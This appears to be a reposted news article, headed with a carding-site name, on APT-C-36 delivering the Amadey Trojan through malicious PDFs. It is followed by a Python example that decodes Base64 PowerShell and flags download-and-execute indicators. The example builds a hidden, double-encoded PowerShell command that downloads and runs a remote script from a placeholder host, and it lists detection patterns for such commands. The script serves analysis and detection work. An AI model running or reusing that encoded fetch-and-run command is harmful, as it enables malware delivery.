The Amadey Trojan as an Undercover Agent in a PDF

Carding 4 Carders

A seemingly harmless PDF can hand over control of your data.

Cybersecurity experts from the 360 Threat Intelligence Center have discovered a new campaign by the APT-C-36 group, which is known for its targeted phishing attacks. This time the attackers stepped up their operation by adding the Amadey Trojan to a campaign that distributes malicious PDF documents.

The Amadey Trojan first appeared for sale in October 2018. It is a modular botnet capable of evading defenses inside internal networks, stealing information, remotely controlling infected systems, carrying out DDoS attacks, and more.

The documents detected in this campaign deliver a malicious VBS script that is downloaded from cloud hosting services and disguised as an encrypted archive. Once the script runs, it launches PowerShell to execute malicious code supplied in Base64 encoding.

Among the downloaded payloads, the researchers found net_dll, a component APT-C-36 frequently uses for reflective DLL loading, and Amadey itself. The Trojan gives the attackers a wide range of capabilities, including data theft and lateral movement within the network.

During the attack, the Trojan is injected into a system process, which lets it run unnoticed on the infected host. Once it has gained control, Amadey downloads additional malicious files, including components for collecting confidential information and executing further malicious scripts.

Each stage of the attack is coordinated with the command-and-control (C2) server, which receives information about the infected computer from the Trojan. This channel lets the APT-C-36 operators monitor the deployment of the malware and collect the stolen data.

It is worth noting that the methods used in this attack resemble those the group has used in the past, which points to a preference for proven approaches. At the same time, the steady introduction of new tools and refinement of existing tactics shows that APT-C-36 continues to develop its capabilities.

Experts warn that the group's activity is not limited to a single region: its attacks affect users around the world. As APT-C-36's tactics and tooling evolve, the number and complexity of its targeted attacks can be expected to grow, which calls for greater attention to cybersecurity measures from organizations and individuals alike.
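As an added example (not code from the 360 Threat Intelligence Center report or from the campaign itself), the Python below shows how an analyst or a detection rule handles the Base64-encoded PowerShell launch described above: it extracts an `-EncodedCommand` blob from a process command line, decodes it as UTF-16LE (the encoding PowerShell expects for that flag), unwraps a nested `FromBase64String(...)` payload that the outer script decodes at run time, and flags common download-and-execute indicators. The command lines and scripts are constructed samples for this illustration, not indicators from the APT-C-36 campaign.

```python
"""Decode and triage Base64-encoded PowerShell found in process command lines.

Added example; the sample scripts and command lines below are constructed
and are not indicators from the campaign described in the article.
"""
import base64
import re

# PowerShell accepts -EncodedCommand and its unique prefixes (-e, -ec, -enc).
# The flag takes Base64 of a UTF-16LE string, not UTF-8.
_ENC_FLAG = re.compile(r"[-/]e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Scripts often stage a second layer via [Convert]::FromBase64String('...').
_FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)

# Indicator name -> regex, applied case-insensitively to the command line
# plus every decoded layer.
INDICATORS = [
    ("Invoke-Expression", r"\biex\b|invoke-expression"),
    ("DownloadString/DownloadFile", r"download(?:string|file)"),
    ("Net.WebClient", r"net\.webclient"),
    ("FromBase64String", r"frombase64string"),
    ("hidden window", r"-w(?:indowstyle)?\s+hidden"),
]


def b64_utf16le(script):
    """Encode a script the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand flag, or None if absent/invalid."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding, odd length, etc.
        return None


def decode_embedded_base64(script):
    """Decode every FromBase64String('...') literal found in a script body.

    UTF-8 is tried first (the common [Text.Encoding]::UTF8.GetString case),
    then UTF-16LE; the encoding named next to the call in the script is the
    authoritative hint if both happen to decode.
    """
    layers = []
    for m in _FROM_B64.finditer(script):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                layers.append(raw.decode(enc))
                break
            except UnicodeDecodeError:
                continue
    return layers


def analyze(cmdline):
    """Decode all layers of a PowerShell launch and list matched indicators."""
    decoded = decode_encoded_command(cmdline)
    nested = decode_embedded_base64(decoded if decoded is not None else cmdline)
    corpus = " ".join([cmdline, decoded or "", *nested])
    hits = [name for name, pat in INDICATORS if re.search(pat, corpus, re.IGNORECASE)]
    return {"encoded": decoded is not None, "decoded": decoded, "nested": nested, "indicators": hits}


# Constructed sample: a hidden-window launch whose encoded script unwraps a
# second Base64 layer that downloads and runs a remote stage.
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
OUTER_SCRIPT = (
    "$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(INNER_SCRIPT.encode("utf-8")).decode("ascii")
    + "'));IEX $p"
)
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + b64_utf16le(OUTER_SCRIPT)

if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print("decoded layer 1:", result["decoded"])
    for layer in result["nested"]:
        print("decoded layer 2:", layer)
    print("indicators:", ", ".join(result["indicators"]))
```

The decoder deliberately accepts the abbreviated flag forms, because operators rarely type the full `-EncodedCommand`; a rule that only matches the long form misses most real launches. Treat the indicator list as triage input rather than a verdict, since legitimate administration scripts also use `Net.WebClient` and `Invoke-Expression`.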